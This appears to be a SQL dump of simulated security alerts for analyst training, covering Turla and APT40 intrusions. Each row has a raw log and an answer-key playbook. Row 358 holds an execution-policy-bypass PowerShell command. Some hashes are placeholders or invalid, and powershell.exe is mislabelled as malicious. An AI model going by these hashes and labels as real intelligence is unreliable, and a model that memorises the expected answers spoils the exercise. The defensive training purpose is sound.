(349, 'Rootkit Deployment for Persistence', 'high', 'System Event Logs', 'To ensure continued access, Turla installs a sophisticated rootkit that embeds itself deeply within the system, evading detection and enabling persistent control.', 'Persistence Mechanism', 'T1014', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"7045\",\"event_source\":\"Service Control Manager\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"service_name\":\"turla_rootkit\",\"service_file_name\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\trkl.sys\",\"service_type\":\"Kernel Driver\",\"service_start_type\":\"Auto\",\"service_account\":\"LocalSystem\",\"network_activity\":{\"external_ip\":\"185.92.220.23\",\"internal_ip\":\"192.168.1.105\",\"protocol\":\"TCP\",\"port\":443},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Turla C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host internal IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious rootkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(350, 'Lateral Movement via Hijacked Credentials', 'high', 'Network Traffic Analysis', 'Anomalous lateral movement detected involving the use of hijacked credentials to access multiple internal systems. The activity is linked to the Turla group, known for its lateral techniques to extend network control.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"192.168.1.15\",\"protocol\":\"RDP\",\"username\":\"jdoe\",\"action\":\"Successful login\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"turla_tool.exe\",\"event_id\":\"4624\",\"description\":\"Successful logon using RDP with hijacked credentials\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Scan\",\"verdict\":\"internal\",\"details\":\"Internal corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Turla tool\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"turla_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with Turla APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(351, 'Exfiltration Through Satellite Link Hijacking', 'high', 'Satellite Communication Logs', 'In a final maneuver, Turla uses hijacked satellite internet links to stealthily exfiltrate sensitive data, masking the C2 traffic and evading traditional network defenses.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:16Z\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"sensitive_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"data_exfiltration\",\"protocol\":\"satellite_link\",\"malware\":\"Turla\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Turla group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Contains potentially sensitive information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(352, 'Suspicious Access to University Network', 'high', 'Firewall logs', 'APT40 exploited a known vulnerability in the university\'s web server software, gaining initial access to the network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:22:10Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"dst_port\":443,\"method\":\"GET\",\"url\":\"/vulnerable_endpoint\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\"http_version\":\"HTTP/1.1\",\"status_code\":200,\"response_size\":5120,\"referer\":\"http://malicious.example.com\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"exploit_payload.bin\",\"action\":\"allowed\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"University web server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"APT40 exploit payload used in multiple attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Investigation\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file name discovered during analysis.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(353, 'Execution of Custom Malware', 'high', 'Endpoint detection systems', 'APT40 executed a custom malware payload shortly after gaining access to the network. The malware is designed to operate stealthily, conducting reconnaissance and data collection.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"EVT12345\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"john_doe\",\"process_name\":\"custom_malware.exe\",\"process_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"command_line\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"detection_method\":\"behavioral analysis\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"network_activity\":[{\"ip_address\":\"203.0.113.45\",\"port\":443,\"protocol\":\"HTTPS\"}]}}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as APT40 custom malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"custom_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Custom malware filename used by APT40.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(354, 'Establishing Persistence via Web Shell', 'high', 'Web server logs', 'APT40 installed a web shell on the compromised server to ensure persistent access, even if initial access vectors are closed. The web shell was identified through unusual POST requests and the presence of a suspicious file on the server.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"request_method\":\"POST\",\"uri\":\"/uploads/shell.jsp\",\"http_version\":\"HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"status_code\":200,\"response_size\":3452,\"referrer\":\"http://example.com/login\",\"file_hash\":\"1a79a4d60de6718e8e5b326e338ae533\",\"username\":\"admin\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"The IP address is associated with known APT40 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This file is recognized as a common web shell used by attackers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"1a79a4d60de6718e8e5b326e338ae533\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Bazaar\",\"verdict\":\"suspicious\",\"details\":\"The hash matches files used in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(355, 'Lateral Movement to Secure Data Sources', 'high', 'Network traffic analysis', 'The attackers used legitimate credentials obtained during the initial breach to navigate through the network, reaching sensitive research databases containing proprietary sonar technology schematics.', 'Lateral Movement', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login using compromised credentials\",\"file_accessed\":\"/network_share/sonar_schematics_v2.pdf\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Access granted to sensitive data after lateral move\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Research database server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"No known issues with file hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(356, 'Exfiltration of Sonar Technology Schematics', 'high', 'Data loss prevention (DLP) systems', 'APT40 utilized encrypted channels to transfer the stolen sonar technology schematics to external servers, completing their data theft operation. The data exfiltration was detected by DLP systems monitoring outgoing traffic. The transfer was executed using the file \'sonar_tech_designs.zip\' over an encrypted connection to a known malicious IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:53:12Z\",\"source_ip\":\"10.0.10.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"sonar_tech_designs.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"transfer_size\":10485760,\"alert_trigger\":\"DLP Policy: Sensitive Data Exfiltration\",\"encryption\":\"TLSv1.2\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT40 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"sonar_tech_designs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive sonar schematics.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in previous exfiltration attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"User account associated with current employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(357, 'Suspicious Web Traffic Detected', 'high', 'Web Proxy Logs', 'A suspicious drive-by download was detected from a compromised ad network, which delivered an initial payload to an internal workstation, potentially leading to unauthorized access.', 'Drive-by Download', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:01Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"url\":\"http://malicious-ad-network.com/ads\",\"method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://trusted-news-portal.com\",\"filename\":\"exploit_kit.js\",\"hash\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"username\":\"jdoe\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-ad-network.com/ads\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known exploit kit\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_kit.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Identified as part of an exploit kit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(358, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A PowerShell script is executed on the infected system, establishing a foothold within the network and allowing further payloads to be delivered.', 'PowerShell Script', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"event_type\":\"process_creation\",\"computer_name\":\"WIN-0A1B2C3D4E5F\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious_payload.ps1\",\"file_hash\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"related_domain\":\"malicious-apt.com\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious script used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious PowerShell scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User with administrative privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(359, 'Persistence Mechanism Established', 'high', 'Windows Event Logs', 'The malware modifies registry keys to ensure it runs on system startup, maintaining persistence even after reboots. The registry modification indicates a sophisticated attempt to establish persistence on the system.', 'Registry Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"EventID\":4657,\"TimeCreated\":\"2023-10-25T14:35:22Z\",\"Computer\":\"victim-pc.localdomain\",\"UserID\":\"S-1-5-21-3456789012-3456789012-3456789012-1001\",\"UserName\":\"john.doe\",\"ProcessID\":4567,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"RegistryKey\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"RegistryValue\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\maliciousApp.exe -silent\",\"Hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"SourceIP\":\"192.168.1.105\",\"AttackerIP\":\"203.0.113.45\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP address known for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(360, 'Credential Dumping Detected', 'high', 'SIEM Alerts', 'The attackers used Mimikatz to extract credentials from memory, enabling lateral movement across the network to escalate privileges.', 'Mimikatz', 'Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:33Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"user\":\"DOMAIN\\\\admin_user\",\"filename\":\"mimikatz.exe\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"process_id\":3216,\"event_type\":\"Credential Dumping\",\"message\":\"Suspicious process mimikatz.exe detected extracting credentials from memory.\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_provider\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Mimikatz executable used for credential extraction.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"DOMAIN\\\\admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"internal\",\"details\":\"Privileged domain account used in the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(361, 'Suspicious File Transfer', 'high', 'Network Traffic Analysis', 'Using SMB, the attackers transfer ransomware payloads to other critical systems within the network. This activity is indicative of lateral movement, preparing for a widespread encryption event.', 'SMB Traffic', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"192.168.1.105\",\"external_attacker_ip\":\"203.0.113.25\",\"protocol\":\"SMB\",\"file_transferred\":\"ransomware_payload.exe\",\"file_hash\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"username\":\"compromised_user\",\"action\":\"file_transfer\",\"smb_command\":\"SMB2_WRITE\",\"destination_port\":\"445\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Filename used in the ransomware attack campaign.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account observed in unauthorized file transfer activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
